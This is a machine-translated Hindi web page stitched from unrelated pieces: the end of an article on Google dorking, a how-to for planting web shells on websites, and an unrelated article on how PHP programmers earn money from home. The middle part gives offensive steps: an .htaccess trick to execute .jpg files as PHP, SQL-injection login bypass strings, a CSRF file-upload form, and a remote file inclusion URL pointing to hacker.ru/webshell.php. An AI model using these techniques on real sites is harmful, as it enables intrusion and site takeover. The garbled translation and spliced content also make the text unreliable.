है, लेकिन भाषा ज्ञात है - PHP। इस मामले में, आप पाइप और सिस्टम सर्च यूटिलिटी डॉर्क्स-सी ऑल | का उपयोग करके मैन्युअल रूप से अपनी आवश्यकतानुसार फ़िल्टर कर सकते हैं findstr /I php > php_dorks.txt (चित्र 13 देखें): <br><br><img src='https://i1.wp.com/habrastorage.org/getpro/habr/post_images/4c1/2f8/6e1/4c12f86e111074293c14d6a939c6ebab.jpg' width="100%" loading=lazy loading=lazy><br>चित्र 13 - उन सभी डॉर्कों को खोजें जहां PHP का उल्लेख है</p><p>किसी खोज इंजन में कमजोरियों या कुछ संवेदनशील जानकारी की खोज केवल तभी की जानी चाहिए जब इस साइट पर कोई महत्वपूर्ण सूचकांक हो। उदाहरण के लिए, यदि किसी साइट पर 10-15 पृष्ठ अनुक्रमित हैं, तो इस तरह से कुछ भी खोजना बेवकूफी है। सूचकांक का आकार जांचना आसान है - बस Google खोज बार में "site:somesite.com" दर्ज करें। अपर्याप्त सूचकांक वाली साइट का एक उदाहरण चित्र 14 में दिखाया गया है। <br><br><img src='https://i0.wp.com/habrastorage.org/getpro/habr/post_images/78e/1db/b4f/78e1dbb4fc78cd422cec311fc2ca9d33.jpg' width="100%" loading=lazy loading=lazy><br>चित्र 14 - साइट सूचकांक आकार की जाँच करना</p><p>अब अप्रिय के बारे में... समय-समय पर Google कैप्चा का अनुरोध कर सकता है - आप इसके बारे में कुछ नहीं कर सकते - आपको इसे दर्ज करना होगा। उदाहरण के लिए, "त्रुटि संदेश" श्रेणी (90 डॉर्क) में खोज करते समय कैप्चा केवल एक बार दिखाई दिया।</p><p>यह जोड़ने योग्य है कि फैंटमज http और सॉक्स इंटरफ़ेस दोनों के माध्यम से प्रॉक्सी के माध्यम से काम करने का भी समर्थन करता है। प्रॉक्सी मोड को सक्षम करने के लिए, आपको dorks.bat या dorks.sh में संबंधित लाइन को अनकम्मेंट करना होगा।</p><p>टूल सोर्स कोड के रूप में उपलब्ध है</p> <br>इस लेख में मैं किसी वेबसाइट पर शेल अपलोड करने के सबसे अधिक उपयोग किए जाने वाले तरीकों के बारे में बात करना चाहता हूं। <b>वेब-खोल</b>एक प्रकार की दुर्भावनापूर्ण स्क्रिप्ट (प्रोग्राम) है जिसका उपयोग हमलावर वेबसाइटों या सर्वर को नियंत्रित करने के लिए करते हैं। <p><b>विधि 1</b><br>फ़ाइलें/चित्र अपलोड करने के लिए वेबसाइट पर एक फॉर्म ढूंढें। मान लीजिए कि हम साइट के एडमिन पैनल को हैक करने में असमर्थ हैं और हम अपने शेल को हैक करने का प्रयास कर रहे हैं <b>एक्सटेंशन.php.jpg .</b>सफल होने पर, हमें चित्र के स्थान पर एक सफेद विंडो दिखाई देगी, हम राइट-क्लिक करें और लिंक का अनुसरण करें। विफलता की स्थिति में, हम क्रोम एक्सटेंशन का उपयोग कर सकते हैं <b>तथ्य से छेड़छाड़</b>. यह आपको अनुरोध को रोकने और अपनी इच्छानुसार बदलने की अनुमति देता है। यदि साइट फ़ाइल एक्सटेंशन की जांच करती है, तो पहले हम अपलोड कर सकते हैं <b>.htaccess</b>सामग्री के साथ फ़ाइल: <br>AddType एप्लिकेशन/x-httpd-php .jpg <br>यह कमांड jpg फ़ाइलों को php के रूप में निष्पादित करेगा। <br><b>विस्तृत वीडियो निर्देश:</b><br></p><p><span class="imp1oe54JeQ"></span></p><p>के लिए वीडियो निर्देश <b>छेड़छाड़ डेटा स्थापना:</b><br></p><p><span class="JA5K4KJ0NCc"></span></p><br><b>विधि 2</b><br>साइट पर एडमिन पैनल खोजने के लिए प्रोग्राम का उपयोग करें - https://github.com/bdblackhat/admin-panel-finder। जब प्रोग्राम को एडमिन पैनल मिल जाए, तो हम sql-इंजेक्शन आज़मा सकते हैं। साइट के लॉगिन और पासवर्ड फ़ील्ड में हम कोड दर्ज करते हैं: <br><p>" या "1"='1 " या 1=1/*</p><p>यदि यह काम करता है, तो हम व्यवस्थापक पैनल पर पहुंच जाते हैं और <b>हम विधि 1 के अनुसार आगे बढ़ते हैं।</b>यदि साइट पर व्यवस्थापक पैनल में कोई एसक्यूएल-इंजेक्शन नहीं है, तो हम इसे डीबग करने का प्रयास कर सकते हैं या इस सीएमएस के लिए एक शोषण ढूंढ सकते हैं। <br><b>विस्तृत वीडियो निर्देश:</b><br></p><p><span class="5Kh5gCr_3rc"></span></p><br><b>विधि 3</b><br>विधि 3 में हम साइट पर ही एसक्यूएल-इंजेक्शन की तलाश करेंगे। हम इसे मैन्युअल रूप से कर सकते हैं या sqlmap का उपयोग कर सकते हैं। मंच पर इंजेक्शन लगाने के तरीके के बारे में पर्याप्त विषय हैं, इसलिए मैं दूर से आऊंगा। तो, अब हमें पहले से ही व्यवस्थापक के लॉगिन और पासवर्ड के साथ एक तालिका मिल गई है, हैश को डिक्रिप्ट करें, व्यवस्थापक पैनल पर जाएं और आनंद लें। लेकिन मान लीजिए कि हम पासवर्ड को डिक्रिप्ट नहीं कर सके और सब कुछ गलत हो गया, तो हमें अपने उपयोगकर्ता के विशेषाधिकारों की जांच करने की आवश्यकता है <b>. </b>हम विशेषाधिकारों की जांच करते हैं और मिनी-शेल लोड करते हैं। <b>किसी कारण से, जब मैं कोड पेस्ट करना चाहता हूं, तो साइट मुझे एक त्रुटि देती है।</b><p><b>विधि 4</b><br>विधि 4 में सीएसआरएफ हमला शामिल है। नीचे दिए गए कोड में हमें प्रतिस्थापित करने की आवश्यकता है <b>एचटीटीपी://</b>हमारे लक्ष्य लिंक के लिए. <b>शेल का चयन करें</b>और बटन दबाएँ <b>डालना।</b><br></p><p> <form method="POST" action="http://" enctype="multipart/form-data" > <input type="file" name="Filedata"></center><br> <input type="submit" name="Submit" value="डालना"> </form></p><p><span class="FXOjzV5I1Cc"></span></p><br><b>विधि 5</b><br>अपने लक्ष्य के बारे में और जानें और एक शोषण खोजें। इसके लिए एक बेहद दिलचस्प वेबसाइट है- https://www.exploit-db.com. किसी ने भी कमजोरियों के माध्यम से वेबसाइटों की बड़े पैमाने पर हैकिंग को रद्द नहीं किया है, लेकिन फॉर्म पर इसके बारे में पहले से ही एक लेख है। <p>एक खोल भरने के और भी कई तरीके हैं और हर एक के बारे में बात करने का कोई मतलब नहीं है। यदि आप अभ्यास करना चाहते हैं, तो DVWA इंस्टॉल करें - यह एक प्रोग्राम है जो सुरक्षा पेशेवरों को कानूनी वातावरण में उनके कौशल और उपकरणों का परीक्षण करने में मदद करने के लिए डिज़ाइन किया गया है।</p><p><b>विधि 6 <br><b>पीएचपी इंजेक्शन</b>- यह किसी वेबसाइट पर हमले का एक रूप है जब हमलावर अपने PHP कोड को हमलावर PHP एप्लिकेशन में इंजेक्ट करता है।</b><br>www.site.ru?page=home.html <br>कमांड निष्पादित करके हम होम,एचटीएमएल पेज लोड करेंगे। अब हम एक दुर्भावनापूर्ण शेल लोड करने का प्रयास करेंगे। <br>www.site.ru?page=http:/hacker.ru/webshell.php <br>डॉर्क: <b>Inurl:पेज=</b></p><p>पर्ल का उपयोग करके पहले से लोड किए गए शेल को ढूंढने का एक तरीका भी है</p> <p> » </p><h1>एक PHP प्रोग्रामर घर बैठे अच्छा पैसा कैसे कमा सकता है?</h1><p>अधिकांश सफल PHP प्रोग्रामर घर से अच्छा पैसा कमाते हैं। किसी भी आय की शुरुआत में कठिनाइयाँ आती हैं। ऐसा होता है कि कठिनाइयाँ और कमाई के तरीकों की जानकारी की कमी घर पर पैसा कमाने की सभी इच्छा को हतोत्साहित करती है, और फिर प्रोग्रामर कार्यालयों में काम करने का अवसर तलाशते हैं, जहाँ अधिक गारंटी होती है कि हर महीने पैसा मिल सकता है, और पेशेवर विकास होता है संभव।</p><p>लेकिन घर से काम करने में सक्षम होने के फायदे से ज्यादा नुकसान हैं।</p><h3>पेशेवरों</h3><p>आप अपने लिए काम करेंगे. कोई भी आपको नौकरी से नहीं निकालेगा, आप अपना शेड्यूल या काम अपने मनचाहे समय पर वितरित कर सकेंगे।</p><p>आप अपने लिए प्रोग्रामिंग का उपयोग करके पैसे कमाने का एक तरीका चुनते हैं, जिससे सबसे पहले, काम में आपकी रुचि बढ़ेगी और दूसरी बात, आपको कार्रवाई की बहुत स्वतंत्रता मिलेगी। आपको किसी ऐसी चीज़ पर काम करने की ज़रूरत नहीं है जो आपको पसंद नहीं है। पैसे कमाने के तरीकों को संयोजित करने के भी अधिक अवसर हैं।</p><h3>विपक्ष</h3><p>शुरुआत में यह कठिन होगा, और अपने काम के लिए पहला पैसा प्राप्त करने के लिए आपको बहुत प्रयास और समय लगाने की आवश्यकता होगी। और लाभ पाने के लिए, आपको लगातार विकास करना होगा और धैर्य रखना होगा और अपना शेड्यूल सही ढंग से वितरित करना होगा ताकि आपके पास समय पर काम पूरा करने के लिए पर्याप्त समय हो।</p><h3>अपनी स्क्रिप्ट से पैसा कमाना</h3><p>इंटरनेट पर कई अलग-अलग स्क्रिप्ट हैं जिन्हें लोग आसानी से डाउनलोड कर सकते हैं और अपनी वेबसाइट पर इंस्टॉल कर सकते हैं। आप अपनी खुद की अनूठी स्क्रिप्ट लिख सकते हैं, और आप अपनी स्क्रिप्ट से पैसे कैसे कमा सकते हैं, इसके लिए दो विकल्प हैं। फ़ाइल साझाकरण सेवाओं के माध्यम से इसे बेचें या पोस्ट करें। आप दो विकल्पों का भी उपयोग कर सकते हैं. उदाहरण के लिए, हल्की स्क्रिप्ट, लेकिन साथ ही फ़ाइल साझाकरण सेवाओं के माध्यम से उन्हीं स्क्रिप्ट को रखना भी बहुत महत्वपूर्ण है जिनकी बड़ी मांग होगी। ऐसा करने के लिए, स्क्रिप्ट की मांग होनी चाहिए ताकि लोग उन्हें अपनी आवश्यकताओं के लिए डाउनलोड करें।</p><p>बड़ी स्क्रिप्ट उचित मूल्य पर बेची जा सकती हैं। आप मंचों पर एक विज्ञापन पोस्ट कर सकते हैं, या यदि आपका अपना निजी ब्लॉग या वेबसाइट है, तो स्क्रिप्ट की बिक्री के लिए एक विज्ञापन लगा सकते हैं।</p><p>किसी भी स्थिति में, चाहे आप कोई भी विकल्प चुनें, स्क्रिप्ट को संग्रह में रखें और अपने बारे में विस्तृत निर्देश और संपर्क जानकारी शामिल करना सुनिश्चित करें। सहायता प्रदान करना सुनिश्चित करें, क्योंकि आपके लिए अपने लिए काम करना महत्वपूर्ण है। आख़िरकार, आपकी अनुशंसा की जानी चाहिए या आपकी स्क्रिप्ट डाउनलोड की जानी चाहिए। वे उच्च गुणवत्ता के होने चाहिए. यदि कोई व्यक्ति आपसे मदद मांगता है, तो विनम्रता से उसे स्क्रिप्ट के बारे में समझाएं या उसे इंस्टॉल करने में उसकी मदद करें। आपकी स्क्रिप्ट में टिप्पणियाँ होनी चाहिए। प्रत्येक कार्य किसके लिए जिम्मेदार है, आदि। आख़िरकार, कोई व्यक्ति आपके कोड में आसानी से भ्रमित हो सकता है, जहाँ कोई नोटेशन नहीं हैं।</p><h3>स्वयं की और संयुक्त परियोजनाएँ</h3><p>सफलतापूर्वक पैसा कमाने के लिए अपनी खुद की वेबसाइट बनाना अच्छा है। आपकी वेबसाइट से पैसे कमाने के कई अवसर हैं। यदि आप इसे अच्छी तरह से प्रचारित करते हैं, तो आप बिक्री के लिए वहां स्क्रिप्ट पोस्ट कर सकते हैं। सहयोगात्मक परियोजनाएँ आपकी क्षमताओं का विस्तार करेंगी, जो होम प्रोग्रामिंग की सफलता के लिए अच्छा है। इसलिए, साझेदारों की तलाश करें या एक साथ प्रोजेक्ट बनाने के प्रस्तावों को अस्वीकार न करें।</p><p>आपको अपनी वेबसाइट पर ध्यान खींचने वाली सुविधाएँ जोड़ना सुनिश्चित करना चाहिए। साइट का स्वरूप नियमित, सरल हो सकता है, लेकिन साथ ही उसका अपना अलग स्वरूप भी हो सकता है। एक निजी वेबसाइट ग्राहकों को बढ़ाने में मदद करती है। वे देखेंगे कि आपकी स्क्रिप्ट कैसे काम करती हैं, अगर उन्हें लोड होने में ज्यादा समय नहीं लगता है, उपयोग करना दिलचस्प है, और सबसे महत्वपूर्ण बात यह है कि वे किसी भी अन्य चीज़ के विपरीत मौलिक हैं। तभी आपको सफलता मिलेगी.</p><h3>ऑर्डर पर कमाई</h3><p>ऐसा करने के लिए, बस फ्रीलांसरों के लिए विभिन्न एक्सचेंजों में पंजीकरण करें और ऑर्डर देखें। पूर्ण किए गए कार्यों का अपना पोर्टफोलियो प्रदर्शित करें। लेकिन सावधान रहें, दुनिया में बेईमान लोग भी हैं और ताकि आप धोखे में न पड़ें, पहले वह काम दिखाएं जो आपके सर्वर पर स्थित है (वैसे, इस मामले में आपको एक वीपीएस http:/ किराए पर लेना होगा) /nkvd.pro/vps/), और फिर यदि वे आपको भाग का भुगतान करते हैं, तो आधा हिस्सा उनके सर्वर पर स्थानांतरित करें, और दूसरे भाग के साथ भी ऐसा ही करें। पैसा कमाने का यह तरीका लाभदायक माना जाता है, लेकिन यह आपके ज्ञान और कौशल की डिग्री पर निर्भर करता है। यह आपके ग्राहकों के फीडबैक पर भी निर्भर करता है। पैसे कमाने के इस तरीके में सफल होने के लिए काम को ईमानदारी और कुशलता से करें। आपको ग्राहकों के साथ संवाद करने में सक्षम होना चाहिए, स्पष्ट रूप से समझाना चाहिए कि आप क्या कर सकते हैं और क्या नहीं।</p><p>यह एक php प्रोग्रामर के लिए कमाई की पूरी सूची नहीं है, लेकिन पैसे कमाने के इन तरीकों के लिए धन्यवाद, जो ऊपर लिखे गए हैं, आप पहले से ही घर छोड़े बिना पैसा कमा सकते हैं। शुरुआती दौर में यह एक बड़ी उपलब्धि होगी. मुख्य बात यहीं रुकना नहीं है। लगातार सुधार करें और ऐसी परियोजनाएं बनाएं जिससे आपको न केवल अच्छी आय होगी, बल्कि आनंद भी मिलेगा।</p> <br><b>लेखक के बारे में</b> <br><p>एक PHP प्रोग्रामर घर बैठे अच्छा पैसा कैसे कमा सकता है?</p> <script type="text/javascript"> <!-- var _acic={dataProvider:10};(function(){var e=document.createElement("script");e.type="text/javascript";e.async=true;e.src="https://www.acint.net/aci.js";var t=document.getElementsByTagName("script")[0];t.parentNode.insertBefore(e,t)})() //--> </script><br> <br> <script>document.write("<img style='display:none;' src='//counter.yadro.ru/hit;artfast_after?t44.1;r"+ escape(document.referrer)+((typeof(screen)=="undefined")?"": ";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth? screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+";h"+escape(document.title.substring(0,150))+ ";"+Math.random()+ "border='0' width='1' height='1' loading=lazy loading=lazy>");</script> </div> </article> <div class="related_block"> <div class="title">संबंधित प्रकाशन</div> <ul class="recent_ul"> <li> <div class="img_block"> <div class="overlay"></div> <img src="/uploads/d356145b8d32a4e43aa5ed76e39606a7.jpg" style="width:230px; height:145px;" / loading=lazy loading=lazy></div> <a href="https://storerarity.ru/hi/vstupit-v-gruppu-po-zarabotku-deneg-kak-zarabotat.html">अपने पेज पर और इसके बिना VKontakte पर पैसे कैसे कमाएँ - वास्तव में काम करने के तरीके</a></li> <li> <div class="img_block"> <div class="overlay"></div> <img src="/uploads/c140bebb4b361b4583c11c49e770bc39.jpg" style="width:230px; height:145px;" / loading=lazy loading=lazy></div> <a href="https://storerarity.ru/hi/kak-pomenyat-temu-dlya-vkontakte-v-yandeks-brauzere-kak-pomenyat-temu-v-kontakte.html">Yandex में VKontakte के लिए थीम कैसे बदलें</a></li> <li> <div class="img_block"> <div class="overlay"></div> <img src="/uploads/40e1db5c5747911f9c43c259f44aeadb.jpg" style="width:230px; height:145px;" / loading=lazy loading=lazy></div> <a href="https://storerarity.ru/hi/nastroika-velokompyutera-na-diametr-koles-26-2-2-podklyuchenie-velokompyutera-kak.html">व्हील व्यास 26 2 के लिए बाइक कंप्यूटर सेट करना</a></li> </ul> </div> </div> <aside id="sidebar"> <div class="block"> <nav class="sidebar_menu"> <div class="menu-sidebar_menu-container"> <ul id="menu-sidebar_menu" class="menu"> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/hi/category/programs/">कार्यक्रमों</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/hi/category/windows/">खिड़कियाँ</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/hi/category/devices/">उपकरण</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/hi/category/browsers/">ब्राउज़र्स</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/hi/category/reviews/">समीक्षा</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/hi/category/reviews/">समीक्षा</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/hi/category/setup/">समायोजन</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/hi/category/torrent/">धार</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/hi/category/editors/">संपादक</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/hi/category/instagram/">Instagram</a></li> </ul> </div> </nav> </div> <div class="block recent_block"> <div class="title">आखिरी नोट्स</div> <ul class="popular"> <li> <div class="img_block"> <div class="overlay"></div> <img width="240" height="145" src="/uploads/5e60cc62a5f20ab07a340013922f0d2c.jpg" class="attachment-popular_thumb size-popular_thumb wp-post-image" alt="दुनिया का सबसे छोटा कंप्यूटर: फोटो, विवरण, रेटिंग दुनिया का सबसे छोटा पीसी" / loading=lazy loading=lazy> <span class="cat">कार्यक्रमों</span></div> <a href="https://storerarity.ru/hi/samyi-malenkii-kompyuter-v-mire-foto-opisanie-reiting.html">दुनिया का सबसे छोटा कंप्यूटर: फोटो, विवरण, रेटिंग दुनिया का सबसे छोटा पीसी</a></li> <li> <div class="img_block"> <div class="overlay"></div> <img width="240" height="145" src="/uploads/cdb555606d94b8ae1d51c87fc743c991.jpg" class="attachment-popular_thumb size-popular_thumb wp-post-image" alt="यूला एप्लिकेशन कैसे इंस्टॉल करें और रजिस्टर करें" / loading=lazy loading=lazy> <span class="cat">कार्यक्रमों</span></div> <a href="https://storerarity.ru/hi/kak-postavit-prilozhenie-yula-zaregistrirovatsya-prilozhenie-yula-ustanovka.html">यूला एप्लिकेशन कैसे इंस्टॉल करें और रजिस्टर करें</a></li> <li> <div class="img_block"> <div class="overlay"></div> <img width="240" height="145" src="/uploads/af70d4bfa7ecf603e659893b5979f8d6.jpg" class="attachment-popular_thumb size-popular_thumb wp-post-image" alt="स्मार्टफ़ोन सैमसंग ग्रैंड डुओस: विशेषताएँ, समीक्षाएँ सैमसंग गैलेक्सी ग्रैंड डुओस विवरण" / loading=lazy loading=lazy> <span class="cat">कार्यक्रमों</span></div> <a href="https://storerarity.ru/hi/samsung-galaxy-grand-duos-bolshoi-i-moshchnyi-smartfon-samsung-grand-duos-harakteristiki-otzyvy-sam.html">स्मार्टफ़ोन सैमसंग ग्रैंड डुओस: विशेषताएँ, समीक्षाएँ सैमसंग गैलेक्सी ग्रैंड डुओस विवरण</a></li> </ul> </div> </aside> </div> </div> <div class="clear"></div> <footer id="footer"><div class="wrapper"> <div class="copy">2024 | सभी के लिए कंप्यूटर - सेटअप, इंस्टालेशन, पुनर्प्राप्ति</div> <nav class="header_menu"> <div class="menu-footer_menu-container"> </div> </nav> </div></footer> <div id="toTop"></div> <script type='text/javascript' src='https://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js'></script> <nav class="mobile_menu"> <div class="close_menu"></div> <div class="mob_menu"> <div class="menu-mobile_menu-container"> <ul id="menu-mobile_menu" class="menu"> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/hi/category/programs/">कार्यक्रमों</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/hi/category/windows/">खिड़कियाँ</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/hi/category/devices/">उपकरण</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/hi/category/browsers/">ब्राउज़र्स</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/hi/category/reviews/">समीक्षा</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/hi/category/reviews/">समीक्षा</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/hi/category/setup/">समायोजन</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/hi/category/torrent/">धार</a></li> </ul> </div> </div> </nav> <script type="text/javascript"> <!-- var _acic={dataProvider:10};(function(){var e=document.createElement("script");e.type="text/javascript";e.async=true;e.src="https://www.acint.net/aci.js";var t=document.getElementsByTagName("script")[0];t.parentNode.insertBefore(e,t)})() //--> </script><br> <br> </body> </html>